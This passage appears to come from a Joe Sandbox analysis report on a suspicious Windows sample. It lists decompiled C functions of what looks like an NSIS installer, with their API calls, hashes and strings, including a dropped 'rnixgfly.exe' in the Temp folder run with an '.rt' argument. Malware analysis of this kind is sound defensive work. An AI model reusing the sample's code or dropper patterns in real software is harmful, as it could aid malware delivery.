                      				_t23 = _a16;
                      				_t53 = _a12;
                      				_t44 = 0xffffffdc;
                      				if(_t23 == 0) {
                      					_push(0x14);
                      					_pop(0);
                      					_t24 = _t53;
                      					if(_t53 < 0x100000) {
                      						_push(0xa);
                      						_pop(0);
                      						_t44 = 0xffffffdd;
                      					}
                      					if(_t53 < 0x400) {
                      						_t44 = 0xffffffde;
                      					}
                      					if(_t53 < 0xffff3333) {
                      						_t52 = 0x14;
                      						asm("cdq");
                      						_t24 = 1 / _t52 + _t53;
                      					}
                      					_t25 = _t24 & 0x00ffffff;
                      					_t55 = _t24 >> 0;
                      					_t46 = 0xa;
                      					_t50 = ((_t24 & 0x00ffffff) + _t25 * 4 + (_t24 & 0x00ffffff) + _t25 * 4 >> 0) % _t46;
                      				} else {
                      					_t55 = (_t23 << 0x00000020 | _t53) >> 0x14;
                      					_t50 = 0;
                      				}
                      				_t31 = E004066A5(_t44, _t50, _t55,  &_v68, 0xffffffdf);
                      				_t33 = E004066A5(_t44, _t50, _t55,  &_v132, _t44);
                      				_t34 = E004066A5(_t44, _t50, 0x423748, 0x423748, _a8);
                      				wsprintfW(_t34 + lstrlenW(0x423748) * 2, L"%u.%u%s%s", _t55, _t50, _t33, _t31);
                      				return SetDlgItemTextW( *0x429238, _a4, 0x423748);
                      			}



















                      0x00404e7a
                      0x00404e7f
                      0x00404e87
                      0x00404e88
                      0x00404e95
                      0x00404e9d
                      0x00404e9e
                      0x00404ea0
                      0x00404ea2
                      0x00404ea4
                      0x00404ea7
                      0x00404ea7
                      0x00404eae
                      0x00404eb4
                      0x00404eb4
                      0x00404ebb
                      0x00404ec2
                      0x00404ec5
                      0x00404ec8
                      0x00404ec8
                      0x00404ecc
                      0x00404edc
                      0x00404ede
                      0x00404ee1
                      0x00404e8a
                      0x00404e8a
                      0x00404e91
                      0x00404e91
                      0x00404ee9
                      0x00404ef4
                      0x00404f0a
                      0x00404f1b
                      0x00404f37

                      APIs
                      • lstrlenW.KERNEL32(00423748,00423748,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404F12
                      • wsprintfW.USER32 ref: 00404F1B
                      • SetDlgItemTextW.USER32 ref: 00404F2E
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.253377158.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.253370521.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253387347.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253445143.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_fyTwP4SHWF.jbxd
                      Similarity
                      • API ID: ItemTextlstrlenwsprintf
                      • String ID: %u.%u%s%s$H7B
                      • API String ID: 3540041739-107966168
                      • Opcode ID: 9c55475845004576d56970086a3160dc1853a6ea3782dd039902276dcfc99cf4
                      • Instruction ID: 20619224473e8c08b4fba53027c62ddcf1c3fef784a2ba69f514aa474de30786
                      • Opcode Fuzzy Hash: 9c55475845004576d56970086a3160dc1853a6ea3782dd039902276dcfc99cf4
                      • Instruction Fuzzy Hash: 1A11D8736041283BDB00A5ADDC45E9F3298AB81338F150637FA26F61D1EA79882182E8
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 48%
                      			E00402EA9(void* __eflags, void* _a4, short* _a8, signed int _a12) {
                      				void* _v8;
                      				int _v12;
                      				short _v536;
                      				void* _t27;
                      				signed int _t33;
                      				intOrPtr* _t35;
                      				signed int _t45;
                      				signed int _t46;
                      				signed int _t47;
                      
                      				_t46 = _a12;
                      				_t47 = _t46 & 0x00000300;
                      				_t45 = _t46 & 0x00000001;
                      				_t27 = E004064D5(__eflags, _a4, _a8, _t47 | 0x00000009,  &_v8);
                      				if(_t27 == 0) {
                      					if((_a12 & 0x00000002) == 0) {
                      						L3:
                      						_push(0x105);
                      						_push( &_v536);
                      						_push(0);
                      						while(RegEnumKeyW(_v8, ??, ??, ??) == 0) {
                      							__eflags = _t45;
                      							if(__eflags != 0) {
                      								L10:
                      								RegCloseKey(_v8);
                      								return 0x3eb;
                      							}
                      							_t33 = E00402EA9(__eflags, _v8,  &_v536, _a12);
                      							__eflags = _t33;
                      							if(_t33 != 0) {
                      								break;
                      							}
                      							_push(0x105);
                      							_push( &_v536);
                      							_push(_t45);
                      						}
                      						RegCloseKey(_v8);
                      						_t35 = E00406A35(3);
                      						if(_t35 != 0) {
                      							return  *_t35(_a4, _a8, _t47, 0);
                      						}
                      						return RegDeleteKeyW(_a4, _a8);
                      					}
                      					_v12 = 0;
                      					if(RegEnumValueW(_v8, 0,  &_v536,  &_v12, 0, 0, 0, 0) != 0x103) {
                      						goto L10;
                      					}
                      					goto L3;
                      				}
                      				return _t27;
                      			}












                      0x00402eb4
                      0x00402ebd
                      0x00402ec6
                      0x00402ed2
                      0x00402edb
                      0x00402ee5
                      0x00402f0a
                      0x00402f10
                      0x00402f15
                      0x00402f16
                      0x00402f46
                      0x00402f1f
                      0x00402f21
                      0x00402f71
                      0x00402f74
                      0x00000000
                      0x00402f7a
                      0x00402f30
                      0x00402f35
                      0x00402f37
                      0x00000000
                      0x00000000
                      0x00402f3f
                      0x00402f44
                      0x00402f45
                      0x00402f45
                      0x00402f52
                      0x00402f5a
                      0x00402f61
                      0x00000000
                      0x00402f8a
                      0x00000000
                      0x00402f69
                      0x00402ef5
                      0x00402f08
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00402f08
                      0x00402f90

                      APIs
                      • RegEnumValueW.ADVAPI32 ref: 00402EFD
                      • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F49
                      • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F52
                      • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F69
                      • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F74
                      Memory Dump Source
                      • Source File: 00000000.00000002.253377158.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.253370521.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253387347.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253445143.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_fyTwP4SHWF.jbxd
                      Similarity
                      • API ID: CloseEnum$DeleteValue
                      • String ID:
                      • API String ID: 1354259210-0
                      • Opcode ID: 2f5760c81b9bdb573da93a40119b3bcbbfe2770e9a6cbc48a05e82d61b54c679
                      • Instruction ID: 37c7ba0f9c491dd7f389852fcb35a119484072d927876f68e32cbd91f0a54eef
                      • Opcode Fuzzy Hash: 2f5760c81b9bdb573da93a40119b3bcbbfe2770e9a6cbc48a05e82d61b54c679
                      • Instruction Fuzzy Hash: 6D216B7150010ABBDF11AF94CE89EEF7B7DEB50384F110076F909B21E0D7B49E54AA68
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 77%
                      			E00401D81(void* __ebx, void* __edx) {
                      				struct HWND__* _t30;
                      				WCHAR* _t38;
                      				void* _t48;
                      				void* _t53;
                      				signed int _t55;
                      				signed int _t60;
                      				long _t63;
                      				void* _t65;
                      
                      				_t53 = __ebx;
                      				if(( *(_t65 - 0x23) & 0x00000001) == 0) {
                      					_t30 = GetDlgItem( *(_t65 - 8),  *(_t65 - 0x28));
                      				} else {
                      					E00402D84(2);
                      					 *((intOrPtr*)(__ebp - 0x10)) = __edx;
                      				}
                      				_t55 =  *(_t65 - 0x24);
                      				 *(_t65 + 8) = _t30;
                      				_t60 = _t55 & 0x00000004;
                      				 *(_t65 - 0x38) = _t55 & 0x00000003;
                      				 *(_t65 - 0x18) = _t55 >> 0x1f;
                      				 *(_t65 - 0x40) = _t55 >> 0x0000001e & 0x00000001;
                      				if((_t55 & 0x00010000) == 0) {
                      					_t38 =  *(_t65 - 0x2c) & 0x0000ffff;
                      				} else {
                      					_t38 = E00402DA6(0x11);
                      				}
                      				 *(_t65 - 0x44) = _t38;
                      				GetClientRect( *(_t65 + 8), _t65 - 0x60);
                      				asm("sbb esi, esi");
                      				_t63 = LoadImageW( ~_t60 &  *0x42a260,  *(_t65 - 0x44),  *(_t65 - 0x38),  *(_t65 - 0x58) *  *(_t65 - 0x18),  *(_t65 - 0x54) *  *(_t65 - 0x40),  *(_t65 - 0x24) & 0x0000fef0);
                      				_t48 = SendMessageW( *(_t65 + 8), 0x172,  *(_t65 - 0x38), _t63);
                      				if(_t48 != _t53 &&  *(_t65 - 0x38) == _t53) {
                      					DeleteObject(_t48);
                      				}
                      				if( *((intOrPtr*)(_t65 - 0x30)) >= _t53) {
                      					_push(_t63);
                      					E004065AF();
                      				}
                      				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t65 - 4));
                      				return 0;
                      			}











                      0x00401d81
                      0x00401d85
                      0x00401d9a
                      0x00401d87
                      0x00401d89
                      0x00401d8f
                      0x00401d8f
                      0x00401da0
                      0x00401da3
                      0x00401dad
                      0x00401db0
                      0x00401db8
                      0x00401dc9
                      0x00401dcc
                      0x00401dd7
                      0x00401dce
                      0x00401dd0
                      0x00401dd0
                      0x00401ddb
                      0x00401de5
                      0x00401e0c
                      0x00401e1b
                      0x00401e29
                      0x00401e31
                      0x00401e39
                      0x00401e39
                      0x00401e42
                      0x00401e48
                      0x00402ba4
                      0x00402ba4
                      0x00402c2d
                      0x00402c39

                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.253377158.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.253370521.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253387347.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253445143.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_fyTwP4SHWF.jbxd
                      Similarity
                      • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                      • String ID:
                      • API String ID: 1849352358-0
                      • Opcode ID: 100b3177012869429c2005611ce111630833f28d1ab152a2d5a2575cfc39775b
                      • Instruction ID: 4d725fdcf847a80329c23b38d7164c003567f542edd6fcacfb34c9ebeef40da9
                      • Opcode Fuzzy Hash: 100b3177012869429c2005611ce111630833f28d1ab152a2d5a2575cfc39775b
                      • Instruction Fuzzy Hash: 67212672904119AFCB05CBA4DE45AEEBBB5EF08304F14003AF945F62A0CB389951DB98
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 73%
                      			E00401E4E(intOrPtr __edx) {
                      				void* __edi;
                      				int _t9;
                      				signed char _t15;
                      				struct HFONT__* _t18;
                      				intOrPtr _t30;
                      				void* _t31;
                      				struct HDC__* _t33;
                      				void* _t35;
                      
                      				_t30 = __edx;
                      				_t33 = GetDC( *(_t35 - 8));
                      				_t9 = E00402D84(2);
                      				 *((intOrPtr*)(_t35 - 0x10)) = _t30;
                      				0x40cdf8->lfHeight =  ~(MulDiv(_t9, GetDeviceCaps(_t33, 0x5a), 0x48));
                      				ReleaseDC( *(_t35 - 8), _t33);
                      				 *0x40ce08 = E00402D84(3);
                      				_t15 =  *((intOrPtr*)(_t35 - 0x20));
                      				 *((intOrPtr*)(_t35 - 0x10)) = _t30;
                      				 *0x40ce0f = 1;
                      				 *0x40ce0c = _t15 & 0x00000001;
                      				 *0x40ce0d = _t15 & 0x00000002;
                      				 *0x40ce0e = _t15 & 0x00000004;
                      				E004066A5(_t9, _t31, _t33, 0x40ce14,  *((intOrPtr*)(_t35 - 0x2c)));
                      				_t18 = CreateFontIndirectW(0x40cdf8);
                      				_push(_t18);
                      				_push(_t31);
                      				E004065AF();
                      				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t35 - 4));
                      				return 0;
                      			}











                      0x00401e4e
                      0x00401e59
                      0x00401e5b
                      0x00401e68
                      0x00401e7f
                      0x00401e84
                      0x00401e91
                      0x00401e96
                      0x00401e9a
                      0x00401ea5
                      0x00401eac
                      0x00401ebe
                      0x00401ec4
                      0x00401ec9
                      0x00401ed3
                      0x00402638
                      0x0040156d
                      0x00402ba4
                      0x00402c2d
                      0x00402c39

                      APIs
                      • GetDC.USER32(?), ref: 00401E51
                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E6B
                      • MulDiv.KERNEL32(00000000,00000000), ref: 00401E73
                      • ReleaseDC.USER32 ref: 00401E84
                        • Part of subcall function 004066A5: lstrcatW.KERNEL32("C:\Users\user~1\AppData\Local\Temp\rnixgfly.exe" C:\Users\user~1\AppData\Local\Temp\somvwkehjlp.rt,\Microsoft\Internet Explorer\Quick Launch), ref: 0040684A
                        • Part of subcall function 004066A5: lstrlenW.KERNEL32("C:\Users\user~1\AppData\Local\Temp\rnixgfly.exe" C:\Users\user~1\AppData\Local\Temp\somvwkehjlp.rt,00000000,00422728,?,00405701,00422728,00000000), ref: 004068A4
                      • CreateFontIndirectW.GDI32(0040CDF8), ref: 00401ED3
                      Memory Dump Source
                      • Source File: 00000000.00000002.253377158.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.253370521.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253387347.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253445143.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_fyTwP4SHWF.jbxd
                      Similarity
                      • API ID: CapsCreateDeviceFontIndirectReleaselstrcatlstrlen
                      • String ID:
                      • API String ID: 2584051700-0
                      • Opcode ID: da8e727cde32dbac5ba0c7db49ef74d213bcb2a0e3f4fe6d3c107a90d4fe1e84
                      • Instruction ID: b9cc094806d22c325402cb6ccb5f5134c2025175c414775df3ff87de861ccae2
                      • Opcode Fuzzy Hash: da8e727cde32dbac5ba0c7db49ef74d213bcb2a0e3f4fe6d3c107a90d4fe1e84
                      • Instruction Fuzzy Hash: 8401B571900241EFEB005BB4EE89A9A3FB0AB15301F208939F541B71D2C6B904459BED
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 59%
                      			E00401C43(intOrPtr __edx) {
                      				int _t29;
                      				long _t30;
                      				signed int _t32;
                      				WCHAR* _t35;
                      				long _t36;
                      				int _t41;
                      				signed int _t42;
                      				int _t46;
                      				int _t56;
                      				intOrPtr _t57;
                      				struct HWND__* _t63;
                      				void* _t64;
                      
                      				_t57 = __edx;
                      				_t29 = E00402D84(3);
                      				 *((intOrPtr*)(_t64 - 0x10)) = _t57;
                      				 *(_t64 - 0x18) = _t29;
                      				_t30 = E00402D84(4);
                      				 *((intOrPtr*)(_t64 - 0x10)) = _t57;
                      				 *(_t64 + 8) = _t30;
                      				if(( *(_t64 - 0x1c) & 0x00000001) != 0) {
                      					 *((intOrPtr*)(__ebp - 0x18)) = E00402DA6(0x33);
                      				}
                      				__eflags =  *(_t64 - 0x1c) & 0x00000002;
                      				if(( *(_t64 - 0x1c) & 0x00000002) != 0) {
                      					 *(_t64 + 8) = E00402DA6(0x44);
                      				}
                      				__eflags =  *((intOrPtr*)(_t64 - 0x34)) - 0x21;
                      				_push(1);
                      				if(__eflags != 0) {
                      					_t61 = E00402DA6();
                      					_t32 = E00402DA6();
                      					asm("sbb ecx, ecx");
                      					asm("sbb eax, eax");
                      					_t35 =  ~( *_t31) & _t61;
                      					__eflags = _t35;
                      					_t36 = FindWindowExW( *(_t64 - 0x18),  *(_t64 + 8), _t35,  ~( *_t32) & _t32);
                      					goto L10;
                      				} else {
                      					_t63 = E00402D84();
                      					 *((intOrPtr*)(_t64 - 0x10)) = _t57;
                      					_t41 = E00402D84(2);
                      					 *((intOrPtr*)(_t64 - 0x10)) = _t57;
                      					_t56 =  *(_t64 - 0x1c) >> 2;
                      					if(__eflags == 0) {
                      						_t36 = SendMessageW(_t63, _t41,  *(_t64 - 0x18),  *(_t64 + 8));
                      						L10:
                      						 *(_t64 - 0x38) = _t36;
                      					} else {
                      						_t42 = SendMessageTimeoutW(_t63, _t41,  *(_t64 - 0x18),  *(_t64 + 8), _t46, _t56, _t64 - 0x38);
                      						asm("sbb eax, eax");
                      						 *((intOrPtr*)(_t64 - 4)) =  ~_t42 + 1;
                      					}
                      				}
                      				__eflags =  *((intOrPtr*)(_t64 - 0x30)) - _t46;
                      				if( *((intOrPtr*)(_t64 - 0x30)) >= _t46) {
                      					_push( *(_t64 - 0x38));
                      					E004065AF();
                      				}
                      				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t64 - 4));
                      				return 0;
                      			}















                      0x00401c43
                      0x00401c45
                      0x00401c4c
                      0x00401c4f
                      0x00401c52
                      0x00401c5c
                      0x00401c60
                      0x00401c63
                      0x00401c6c
                      0x00401c6c
                      0x00401c6f
                      0x00401c73
                      0x00401c7c
                      0x00401c7c
                      0x00401c7f
                      0x00401c83
                      0x00401c85
                      0x00401cda
                      0x00401cdc
                      0x00401ce7
                      0x00401cf1
                      0x00401cf4
                      0x00401cf4
                      0x00401cfd
                      0x00000000
                      0x00401c87
                      0x00401c8e
                      0x00401c90
                      0x00401c93
                      0x00401c99
                      0x00401ca0
                      0x00401ca3
                      0x00401ccb
                      0x00401d03
                      0x00401d03
                      0x00401ca5
                      0x00401cb3
                      0x00401cbb
                      0x00401cbe
                      0x00401cbe
                      0x00401ca3
                      0x00401d06
                      0x00401d09
                      0x00401d0f
                      0x00402ba4
                      0x00402ba4
                      0x00402c2d
                      0x00402c39

                      APIs
                      • SendMessageTimeoutW.USER32 ref: 00401CB3
                      • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CCB
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.253377158.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.253370521.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253387347.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253445143.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_fyTwP4SHWF.jbxd
                      Similarity
                      • API ID: MessageSend$Timeout
                      • String ID: !
                      • API String ID: 1777923405-2657877971
                      • Opcode ID: b183ccb6ab3284ced798d12f720e161a9248df31e23c89b80f307d5b894ef539
                      • Instruction ID: e1c20d37316975b9b94706f7b3abd8da4b7b3b5136eece5bd2aa3cbae88a6c19
                      • Opcode Fuzzy Hash: b183ccb6ab3284ced798d12f720e161a9248df31e23c89b80f307d5b894ef539
                      • Instruction Fuzzy Hash: 28219E7190420AEFEF05AFA4D94AAAE7BB4FF44304F14453EF601B61D0D7B88941CB98
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 91%
                      			E00406536(void* __ecx, void* __eflags, char _a4, int _a8, short* _a12, char* _a16, signed int _a20) {
                      				int _v8;
                      				long _t21;
                      				long _t24;
                      				char* _t30;
                      
                      				asm("sbb eax, eax");
                      				_v8 = 0x800;
                      				_t5 =  &_a4; // 0x422728
                      				_t21 = E004064D5(__eflags,  *_t5, _a8,  ~_a20 & 0x00000100 | 0x00020019,  &_a20);
                      				_t30 = _a16;
                      				if(_t21 != 0) {
                      					L4:
                      					 *_t30 =  *_t30 & 0x00000000;
                      				} else {
                      					_t24 = RegQueryValueExW(_a20, _a12, 0,  &_a8, _t30,  &_v8);
                      					_t21 = RegCloseKey(_a20);
                      					_t30[0x7fe] = _t30[0x7fe] & 0x00000000;
                      					if(_t24 != 0 || _a8 != 1 && _a8 != 2) {
                      						goto L4;
                      					}
                      				}
                      				return _t21;
                      			}







                      0x00406544
                      0x00406546
                      0x0040655b
                      0x0040655e
                      0x00406563
                      0x00406568
                      0x004065a6
                      0x004065a6
                      0x0040656a
                      0x0040657c
                      0x00406587
                      0x0040658d
                      0x00406598
                      0x00000000
                      0x00000000
                      0x00406598
                      0x004065ac

                      APIs
                      • RegQueryValueExW.ADVAPI32(?,?,00000000,?,?,0040A230,00000000,('B,00000000,?,?,"C:\Users\user~1\AppData\Local\Temp\rnixgfly.exe" C:\Users\user~1\AppData\Local\Temp\somvwkehjlp.rt,?,?,0040679D,80000002), ref: 0040657C
                      • RegCloseKey.ADVAPI32(?,?,0040679D,80000002,Software\Microsoft\Windows\CurrentVersion,"C:\Users\user~1\AppData\Local\Temp\rnixgfly.exe" C:\Users\user~1\AppData\Local\Temp\somvwkehjlp.rt,"C:\Users\user~1\AppData\Local\Temp\rnixgfly.exe" C:\Users\user~1\AppData\Local\Temp\somvwkehjlp.rt,"C:\Users\user~1\AppData\Local\Temp\rnixgfly.exe" C:\Users\user~1\AppData\Local\Temp\somvwkehjlp.rt,00000000,00422728), ref: 00406587
                      Strings
                      • ('B, xrefs: 0040655B
                      • "C:\Users\user~1\AppData\Local\Temp\rnixgfly.exe" C:\Users\user~1\AppData\Local\Temp\somvwkehjlp.rt, xrefs: 0040653D
                      Memory Dump Source
                      • Source File: 00000000.00000002.253377158.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.253370521.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253387347.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253445143.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_fyTwP4SHWF.jbxd
                      Similarity
                      • API ID: CloseQueryValue
                      • String ID: "C:\Users\user~1\AppData\Local\Temp\rnixgfly.exe" C:\Users\user~1\AppData\Local\Temp\somvwkehjlp.rt$('B
                      • API String ID: 3356406503-2019259919
                      • Opcode ID: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                      • Instruction ID: 52dd0fe420a7c1e2827d1a164217834099ee72e945ce70567094b216899e5676
                      • Opcode Fuzzy Hash: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                      • Instruction Fuzzy Hash: C4017C72500209FADF21CF51DD09EDB3BA8EF54364F01803AFD1AA2190D738D964DBA4
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 58%
                      			E00405F37(WCHAR* _a4) {
                      				WCHAR* _t9;
                      
                      				_t9 = _a4;
                      				_push( &(_t9[lstrlenW(_t9)]));
                      				_push(_t9);
                      				if( *(CharPrevW()) != 0x5c) {
                      					lstrcatW(_t9, 0x40a014);
                      				}
                      				return _t9;
                      			}




                      0x00405f38
                      0x00405f45
                      0x00405f46
                      0x00405f51
                      0x00405f59
                      0x00405f59
                      0x00405f61

                      APIs
                      • lstrlenW.KERNEL32(?,C:\Users\user~1\AppData\Local\Temp\,0040362D,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00403923), ref: 00405F3D
                      • CharPrevW.USER32(?,00000000,?,C:\Users\user~1\AppData\Local\Temp\,0040362D,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00403923), ref: 00405F47
                      • lstrcatW.KERNEL32(?,0040A014), ref: 00405F59
                      Strings
                      • C:\Users\user~1\AppData\Local\Temp\, xrefs: 00405F37
                      Memory Dump Source
                      • Source File: 00000000.00000002.253377158.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.253370521.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253387347.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253445143.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_fyTwP4SHWF.jbxd
                      Similarity
                      • API ID: CharPrevlstrcatlstrlen
                      • String ID: C:\Users\user~1\AppData\Local\Temp\
                      • API String ID: 2659869361-2382934351
                      • Opcode ID: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
                      • Instruction ID: 9007417a49851ea4d61da9c71e51c63d156abd36d345156a737e00ee84923012
                      • Opcode Fuzzy Hash: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
                      • Instruction Fuzzy Hash: 59D05E611019246AC111AB548D04DDB63ACAE85304742046AF601B60A0CB7E196287ED
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 89%
                      			E0040563E(struct HWND__* _a4, int _a8, int _a12, long _a16) {
                      				int _t15;
                      				long _t16;
                      
                      				_t15 = _a8;
                      				if(_t15 != 0x102) {
                      					if(_t15 != 0x200) {
                      						_t16 = _a16;
                      						L7:
                      						if(_t15 == 0x419 &&  *0x423734 != _t16) {
                      							_push(_t16);
                      							_push(6);
                      							 *0x423734 = _t16;
                      							E00404FFF();
                      						}
                      						L11:
                      						return CallWindowProcW( *0x42373c, _a4, _t15, _a12, _t16);
                      					}
                      					if(IsWindowVisible(_a4) == 0) {
                      						L10:
                      						_t16 = _a16;
                      						goto L11;
                      					}
                      					_t16 = E00404F7F(_a4, 1);
                      					_t15 = 0x419;
                      					goto L7;
                      				}
                      				if(_a12 != 0x20) {
                      					goto L10;
                      				}
